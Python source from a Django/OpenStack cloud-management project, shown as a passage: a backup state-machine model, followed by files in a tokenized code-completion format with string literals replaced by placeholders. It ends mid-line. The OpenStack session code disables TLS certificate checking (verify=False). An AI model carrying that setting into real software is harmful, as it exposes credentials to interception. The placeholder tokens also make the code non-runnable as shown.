        (States.READY, '<STR_LIT>'),
        (States.BACKING_UP, '<STR_LIT>'),
        (States.RESTORING, '<STR_LIT>'),
        (States.DELETING, '<STR_LIT>'),
        (States.ERRED, '<STR_LIT>'),
        (States.DELETED, '<STR_LIT>'),
    )

    # Transitions are only legal through the @transition-decorated methods.
    state = FSMIntegerField(default=States.READY, choices=STATE_CHOICES)
    metadata = JSONField(
        blank=True,
        help_text='<STR_LIT>',
    )

    objects = managers.BackupManager()

    def __str__(self):
        return '<STR_LIT>' % {
            '<STR_LIT>': self.uuid,
            '<STR_LIT:object>': self.backup_source,
        }

    def start_backup(self):
        """<STR_LIT>"""
        # Local import avoids a circular import with the tasks module.
        from nodeconductor.backup import tasks
        self._starting_backup()
        self.__save()
        tasks.process_backup_task.delay(self.uuid.hex)

    def start_restoration(self, instance_uuid, user_input, snapshot_ids):
        """<STR_LIT>"""
        from nodeconductor.backup import tasks
        self._starting_restoration()
        self.__save()
        tasks.restoration_task.delay(self.uuid.hex, instance_uuid.hex, user_input, snapshot_ids)

    def start_deletion(self):
        """<STR_LIT>"""
        from nodeconductor.backup import tasks
        self._starting_deletion()
        self.__save()
        tasks.deletion_task.delay(self.uuid.hex)

    def set_metadata(self, metadata):
        self.metadata = metadata
        self.__save()

    # confirm_* / erred: async tasks call these to finalize a transition.
    def confirm_backup(self):
        self._confirm_backup()
        self.__save()

    def confirm_restoration(self):
        self._confirm_restoration()
        self.__save()

    def confirm_deletion(self):
        self._confirm_deletion()
        self.__save()

    def erred(self):
        self._erred()
        self.__save()

    def get_strategy(self):
        # Translate a missing strategy (KeyError) into the domain exception.
        try:
            return utils.get_object_backup_strategy(self.backup_source)
        except KeyError:
            six.reraise(exceptions.BackupStrategyNotFoundError, exceptions.BackupStrategyNotFoundError())

    # FSM transition guards: bodies are empty, django_fsm updates `state`.
    @transition(field=state, source=States.READY, target=States.BACKING_UP)
    def _starting_backup(self):
        pass

    @transition(field=state, source=States.BACKING_UP, target=States.READY)
    def _confirm_backup(self):
        pass

    @transition(field=state, source=States.READY, target=States.RESTORING)
    def _starting_restoration(self):
        pass

    @transition(field=state, source=States.RESTORING, target=States.READY)
    def _confirm_restoration(self):
        pass

    @transition(field=state, source=States.READY, target=States.DELETING)
    def _starting_deletion(self):
        pass

    @transition(field=state, source=States.DELETING, target=States.DELETED)
    def _confirm_deletion(self):
        pass

    @transition(field=state, source='<STR_LIT:*>', target=States.ERRED)
    def _erred(self):
        pass

    def __save(self, *args, **kwargs):
        # Name-mangled helper so subclasses overriding save() don't change
        # how state transitions are persisted.
        return super(Backup, self).save(*args, **kwargs)

    def get_log_fields(self):
        return ('<STR_LIT>', '<STR_LIT:name>', '<STR_LIT>')


class BackupStrategy(object):
    """<STR_LIT>"""
    # Abstract strategy interface: concrete per-model strategies must
    # override every classmethod below.
    @classmethod
    def get_model(cls):
        raise NotImplementedError(
            '<STR_LIT>')

    @classmethod
    def backup(cls, backup_source):
        raise NotImplementedError(
            '<STR_LIT>')

    @classmethod
    def restore(cls, backup_source, metadata, user_input):
        raise NotImplementedError(
            '<STR_LIT>')

    @classmethod
    def get_restoration_serializer(cls, backup_source, metadata, user_input):
        raise NotImplementedError(
            '<STR_LIT>')

    @classmethod
    def delete(cls, backup_source, metadata):
        raise NotImplementedError(
            '<STR_LIT>')
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import re <EOL> import nodeconductor . core . models <EOL> import django . utils . timezone <EOL> from django . conf import settings <EOL> import django . contrib . auth . models <EOL> import uuidfield . fields <EOL> import django . core . validators <EOL> class Migration ( migrations . Migration ) : <EOL> replaces = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:password>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:description>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , uuidfield . fields . UUIDField ( unique = True , max_length = <NUM_LIT:32> , editable = False , blank = True ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( help_text = '<STR_LIT>' , unique = True , max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT:username>' , validators = [ django . core . validators . RegexValidator ( re . compile ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( null = True , default = None , max_length = <NUM_LIT:10> , blank = True , unique = True , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . 
CharField ( max_length = <NUM_LIT:100> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , models . EmailField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = b'<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> managers = [ <EOL> ( '<STR_LIT>' , django . contrib . auth . models . UserManager ( ) ) , <EOL> ] , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , uuidfield . fields . 
UUIDField ( unique = True , max_length = <NUM_LIT:32> , editable = False , blank = True ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( validators = [ django . core . validators . MaxLengthValidator ( <NUM_LIT> ) , nodeconductor . core . models . validate_ssh_public_key ] ) ) , <EOL> ( '<STR_LIT:user>' , models . ForeignKey ( to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : set ( [ ( '<STR_LIT:user>' , '<STR_LIT:name>' ) ] ) , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT:user>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import random <EOL> from django . core . management . base import BaseCommand <EOL> from django . utils import timezone <EOL> from nodeconductor . cost_tracking import models <EOL> class Command ( BaseCommand ) : <EOL> def handle ( self , * args , ** options ) : <EOL> current_month = timezone . now ( ) . month <EOL> current_year = timezone . now ( ) . year <EOL> for model in models . PriceEstimate . get_estimated_models ( ) : <EOL> self . stdout . write ( '<STR_LIT>' . format ( model . __name__ ) ) <EOL> estimates = [ ] <EOL> for obj in model . objects . all ( ) : <EOL> self . stdout . write ( '<STR_LIT>' . format ( obj ) ) <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> year = current_year <EOL> month = current_month - i <EOL> if month < <NUM_LIT:1> : <EOL> year = current_year - <NUM_LIT:1> <EOL> month += <NUM_LIT:12> <EOL> estimates . append ( <EOL> models . PriceEstimate ( <EOL> scope = obj , <EOL> total = random . randint ( <NUM_LIT:100> , <NUM_LIT> ) , <EOL> details = { <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> } , <EOL> year = year , <EOL> month = month , <EOL> ) <EOL> ) <EOL> models . PriceEstimate . objects . bulk_create ( estimates ) <EOL> self . stdout . write ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import time <EOL> import uuid <EOL> import logging <EOL> import datetime <EOL> import calendar <EOL> import pkg_resources <EOL> import dateutil . parser <EOL> from itertools import groupby <EOL> from ceilometerclient import client as ceilometer_client <EOL> from cinderclient import exceptions as cinder_exceptions <EOL> from cinderclient . v1 import client as cinder_client <EOL> from django . conf import settings <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned <EOL> from django . db import transaction <EOL> from django . db . models import ProtectedError <EOL> from django . utils import dateparse <EOL> from django . utils import six <EOL> from django . utils import timezone <EOL> from django . utils . lru_cache import lru_cache <EOL> from glanceclient import exc as glance_exceptions <EOL> from glanceclient . v1 import client as glance_client <EOL> from keystoneclient import exceptions as keystone_exceptions <EOL> from keystoneclient import session as keystone_session <EOL> from keystoneclient . auth . identity import v2 <EOL> from keystoneclient . service_catalog import ServiceCatalog <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from neutronclient . client import exceptions as neutron_exceptions <EOL> from neutronclient . v2_0 import client as neutron_client <EOL> from novaclient import exceptions as nova_exceptions <EOL> from novaclient . v1_1 import client as nova_client <EOL> from nodeconductor . core import NodeConductorExtension <EOL> from nodeconductor . core . models import SynchronizationStates <EOL> from nodeconductor . core . tasks import send_task <EOL> from nodeconductor . iaas . log import event_logger <EOL> from nodeconductor . iaas import models <EOL> from nodeconductor . 
structure import ServiceBackend , ServiceBackendError , ServiceBackendNotImplemented <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_cinder_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_neutron_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_nova_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class CloudBackendError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CloudBackendInternalError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class OpenStackClient ( object ) : <EOL> """<STR_LIT>""" <EOL> class Session ( dict ) : <EOL> """<STR_LIT>""" <EOL> OPTIONS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:username>' , '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RECREATE_SESSION = True <EOL> def __init__ ( self , backend , ks_session = None , ** credentials ) : <EOL> self . backend = backend . __class__ ( ) <EOL> self . keystone_session = ks_session <EOL> if not self . keystone_session : <EOL> auth_plugin = v2 . Password ( ** credentials ) <EOL> self . keystone_session = keystone_session . Session ( auth = auth_plugin , verify = False ) <EOL> try : <EOL> self . keystone_session . get_token ( ) <EOL> except ( keystone_exceptions . AuthorizationFailure , keystone_exceptions . ConnectionRefused ) as e : <EOL> six . reraise ( CloudBackendError , e ) <EOL> if self . 
RECREATE_SESSION : <EOL> for opt in credentials : <EOL> self [ opt ] = credentials [ opt ] <EOL> else : <EOL> for opt in self . OPTIONS : <EOL> self [ opt ] = getattr ( self . auth , opt ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . keystone_session , name ) <EOL> @ classmethod <EOL> def factory ( cls , backend , session ) : <EOL> if cls . RECREATE_SESSION : <EOL> return cls ( backend , ** session ) <EOL> else : <EOL> auth_plugin = v2 . Token ( <EOL> auth_url = session [ '<STR_LIT>' ] , <EOL> token = session [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> ks_session = keystone_session . Session ( auth = auth_plugin ) <EOL> return cls ( backend , ks_session = ks_session ) <EOL> def validate ( self ) : <EOL> expiresat = dateutil . parser . parse ( self . auth . auth_ref [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if expiresat > timezone . now ( ) + datetime . timedelta ( minutes = <NUM_LIT:10> ) : <EOL> return True <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return str ( { k : v if k != '<STR_LIT:password>' else '<STR_LIT>' for k , v in self } ) <EOL> def create_admin_session ( self , keystone_url ) : <EOL> try : <EOL> credentials = models . OpenStackSettings . objects . get ( <EOL> auth_url = keystone_url ) . get_credentials ( ) <EOL> except models . OpenStackSettings . DoesNotExist as e : <EOL> logger . exception ( '<STR_LIT>' , keystone_url ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> self . session = self . Session ( self , ** credentials ) <EOL> return self . session <EOL> def create_tenant_session ( self , credentials ) : <EOL> try : <EOL> self . session = self . Session ( self , ** credentials ) <EOL> except AttributeError as e : <EOL> logger . error ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> return self . session <EOL> @ classmethod <EOL> def recover_session ( cls , session ) : <EOL> """<STR_LIT>""" <EOL> if not session or ( not cls . Session . 
RECREATE_SESSION and not session . get ( '<STR_LIT>' ) ) : <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> backend = cls ( ) <EOL> return backend . Session . factory ( backend , session ) <EOL> @ classmethod <EOL> def create_keystone_client ( cls , session ) : <EOL> return keystone_client . Client ( session = session ) <EOL> @ classmethod <EOL> def create_nova_client ( cls , session ) : <EOL> if _get_nova_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . tenant_name , <EOL> } <EOL> return nova_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_neutron_client ( cls , session ) : <EOL> if _get_neutron_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT:password>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . tenant_name , <EOL> } <EOL> return neutron_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_cinder_client ( cls , session ) : <EOL> if _get_cinder_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . 
tenant_name , <EOL> } <EOL> return cinder_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_glance_client ( cls , session ) : <EOL> catalog = ServiceCatalog . factory ( session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT:image>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : session . get_token ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return glance_client . Client ( endpoint , ** kwargs ) <EOL> @ classmethod <EOL> def create_ceilometer_client ( cls , session ) : <EOL> catalog = ServiceCatalog . factory ( session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : lambda : session . get_token ( ) , <EOL> '<STR_LIT>' : endpoint , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return ceilometer_client . Client ( '<STR_LIT:2>' , ** kwargs ) <EOL> class OpenStackBackend ( ServiceBackend , OpenStackClient ) : <EOL> """<STR_LIT>""" <EOL> MAX_USERNAME_LENGTH = <NUM_LIT:64> <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> @ classmethod <EOL> def create_session ( <EOL> cls , keystone_url = None , instance_uuid = None , membership_id = None , check_tenant = True , membership = None , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> backend = cls ( ) <EOL> if keystone_url : <EOL> return backend . create_admin_session ( keystone_url ) <EOL> elif instance_uuid or membership or membership_id : <EOL> if instance_uuid : <EOL> instance = models . Instance . objects . get ( uuid = instance_uuid ) <EOL> membership = instance . cloud_project_membership <EOL> if membership_id : <EOL> membership = models . CloudProjectMembership . objects . get ( id = membership_id ) <EOL> credentials = { <EOL> '<STR_LIT>' : membership . cloud . auth_url , <EOL> '<STR_LIT:username>' : membership . username , <EOL> '<STR_LIT:password>' : membership . 
password , <EOL> } <EOL> if check_tenant : <EOL> if not membership . tenant_id : <EOL> raise CloudBackendError ( "<STR_LIT>" ) <EOL> credentials [ '<STR_LIT>' ] = membership . tenant_id <EOL> return backend . create_tenant_session ( credentials ) <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> def get_backend_disk_size ( self , core_disk_size ) : <EOL> return core_disk_size / <NUM_LIT> <EOL> def get_backend_ram_size ( self , core_ram_size ) : <EOL> return core_ram_size <EOL> def get_core_disk_size ( self , backend_disk_size ) : <EOL> return backend_disk_size * <NUM_LIT> <EOL> def get_core_ram_size ( self , backend_ram_size ) : <EOL> return backend_ram_size <EOL> def stop ( self , instance ) : <EOL> instance . schedule_stopping ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def add_ssh_key ( self , public_key , membership ) : <EOL> return self . push_ssh_public_key ( membership , public_key ) <EOL> def remove_ssh_key ( self , public_key , membership ) : <EOL> return self . remove_ssh_public_key ( membership , public_key ) <EOL> def add_user ( self , user , membership ) : <EOL> pass <EOL> def remove_user ( self , user , membership ) : <EOL> pass <EOL> def remove_link ( self , membership ) : <EOL> raise ServiceBackendNotImplemented <EOL> def get_resources_for_import ( self ) : <EOL> raise ServiceBackendNotImplemented <EOL> def get_monthly_cost_estimate ( self , instance ) : <EOL> if not NodeConductorExtension . is_installed ( '<STR_LIT>' ) : <EOL> raise ServiceBackendNotImplemented <EOL> from nodeconductor_killbill . backend import KillBillBackend , KillBillError <EOL> from nodeconductor . openstack . models import Instance as opInstance <EOL> if opInstance . objects . filter ( uuid = instance . uuid ) . exists ( ) : <EOL> raise ServiceBackendNotImplemented <EOL> try : <EOL> backend = KillBillBackend ( instance . customer ) <EOL> invoice = backend . 
get_invoice_estimate ( instance ) <EOL> except KillBillError as e : <EOL> logger . error ( "<STR_LIT>" , instance , e ) <EOL> six . reraise ( ServiceBackendError , e ) <EOL> today = datetime . date . today ( ) <EOL> if not invoice [ '<STR_LIT>' ] <= today <= invoice [ '<STR_LIT>' ] : <EOL> raise ServiceBackendError ( "<STR_LIT>" % ( instance , invoice ) ) <EOL> daily_cost = invoice [ '<STR_LIT>' ] / ( ( today - invoice [ '<STR_LIT>' ] ) . days + <NUM_LIT:1> ) <EOL> monthly_cost = daily_cost * calendar . monthrange ( today . year , today . month ) [ <NUM_LIT:1> ] <EOL> return monthly_cost <EOL> def push_cloud_account ( self , cloud_account ) : <EOL> pass <EOL> def pull_cloud_account ( self , cloud_account ) : <EOL> self . pull_flavors ( cloud_account ) <EOL> self . pull_images ( cloud_account ) <EOL> self . pull_service_statistics ( cloud_account ) <EOL> def pull_flavors ( self , cloud_account ) : <EOL> session = self . create_session ( keystone_url = cloud_account . auth_url ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_flavors = nova . flavors . findall ( is_public = True ) <EOL> backend_flavors = dict ( ( ( f . id , f ) for f in backend_flavors ) ) <EOL> with transaction . atomic ( ) : <EOL> nc_flavors = cloud_account . flavors . all ( ) <EOL> nc_flavors = dict ( ( ( f . backend_id , f ) for f in nc_flavors ) ) <EOL> backend_ids = set ( backend_flavors . keys ( ) ) <EOL> nc_ids = set ( nc_flavors . keys ( ) ) <EOL> for flavor_id in nc_ids - backend_ids : <EOL> nc_flavor = nc_flavors [ flavor_id ] <EOL> logger . debug ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> try : <EOL> nc_flavor . delete ( ) <EOL> except ProtectedError : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_flavor . uuid ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> for flavor_id in backend_ids - nc_ids : <EOL> backend_flavor = backend_flavors [ flavor_id ] <EOL> nc_flavor = cloud_account . flavors . create ( <EOL> name = backend_flavor . 
name , <EOL> cores = backend_flavor . vcpus , <EOL> ram = self . get_core_ram_size ( backend_flavor . ram ) , <EOL> disk = self . get_core_disk_size ( backend_flavor . disk ) , <EOL> backend_id = backend_flavor . id , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> for flavor_id in nc_ids & backend_ids : <EOL> nc_flavor = nc_flavors [ flavor_id ] <EOL> backend_flavor = backend_flavors [ flavor_id ] <EOL> nc_flavor . name = backend_flavor . name <EOL> nc_flavor . cores = backend_flavor . vcpus <EOL> nc_flavor . ram = self . get_core_ram_size ( backend_flavor . ram ) <EOL> nc_flavor . disk = self . get_core_disk_size ( backend_flavor . disk ) <EOL> nc_flavor . save ( ) <EOL> logger . debug ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> def pull_images ( self , cloud_account ) : <EOL> session = self . create_session ( keystone_url = cloud_account . auth_url ) <EOL> glance = self . create_glance_client ( session ) <EOL> backend_images = dict ( <EOL> ( image . id , image ) <EOL> for image in glance . images . list ( ) <EOL> if not image . deleted <EOL> if image . is_public <EOL> ) <EOL> from nodeconductor . iaas . models import TemplateMapping <EOL> with transaction . atomic ( ) : <EOL> current_image_ids = set ( ) <EOL> mapping_queryset = ( <EOL> TemplateMapping . objects <EOL> . filter ( backend_image_id__in = backend_images . keys ( ) ) <EOL> . order_by ( '<STR_LIT>' ) <EOL> ) <EOL> mappings_grouped = groupby ( mapping_queryset . iterator ( ) , lambda m : m . template . pk ) <EOL> for _ , mapping_iterator in mappings_grouped : <EOL> mappings = list ( mapping_iterator ) <EOL> mapping = mappings [ <NUM_LIT:0> ] <EOL> if len ( mappings ) > <NUM_LIT:1> : <EOL> logger . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> mapping . template , '<STR_LIT:U+002CU+0020>' . join ( m . backend_image_id for m in mappings ) , <EOL> ) <EOL> else : <EOL> backend_image = backend_images [ mapping . backend_image_id ] <EOL> image , created = cloud_account . images . 
get_or_create ( <EOL> template = mapping . template , <EOL> defaults = { '<STR_LIT>' : mapping . backend_image_id } , <EOL> ) <EOL> if created : <EOL> logger . info ( '<STR_LIT>' , image , image . backend_id ) <EOL> elif ( image . backend_id != mapping . backend_image_id or <EOL> image . min_disk != backend_image . min_disk or <EOL> image . min_ram != backend_image . min_ram ) : <EOL> image . backend_id = mapping . backend_image_id <EOL> image . min_ram = self . get_core_ram_size ( backend_image . min_ram ) <EOL> image . min_disk = self . get_core_disk_size ( backend_image . min_disk ) <EOL> image . save ( ) <EOL> logger . debug ( '<STR_LIT>' , image , image . backend_id ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , image , image . backend_id ) <EOL> current_image_ids . add ( image . backend_id ) <EOL> for image in cloud_account . images . exclude ( backend_id__in = current_image_ids ) : <EOL> image . delete ( ) <EOL> logger . info ( '<STR_LIT>' , image , image . backend_id ) <EOL> def push_membership ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( keystone_url = membership . cloud . auth_url ) <EOL> keystone = self . create_keystone_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> tenant = self . get_or_create_tenant ( membership , keystone ) <EOL> username , password = self . get_or_create_user ( membership , keystone ) <EOL> membership . username = username <EOL> membership . password = password <EOL> membership . tenant_id = tenant . id <EOL> self . ensure_user_is_tenant_admin ( username , tenant , keystone ) <EOL> self . get_or_create_internal_network ( membership , neutron ) <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , membership . id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . 
reraise ( CloudBackendError , e ) <EOL> def push_ssh_public_key ( self , membership , public_key ) : <EOL> key_name = self . get_key_name ( public_key ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> try : <EOL> nova . keypairs . find ( fingerprint = public_key . fingerprint ) <EOL> except nova_exceptions . NotFound : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> nova . keypairs . create ( name = key_name , public_key = public_key . public_key ) <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , key_name ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def remove_ssh_public_key ( self , membership , public_key ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> keys = nova . keypairs . findall ( fingerprint = public_key . fingerprint ) <EOL> key_name = self . get_key_name ( public_key ) <EOL> for key in keys : <EOL> if key . name == key_name : <EOL> nova . keypairs . delete ( key ) <EOL> logger . info ( '<STR_LIT>' , public_key . name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , public_key . name ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def push_membership_quotas ( self , membership , quotas ) : <EOL> cinder_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , self . get_backend_disk_size ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> nova_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , self . 
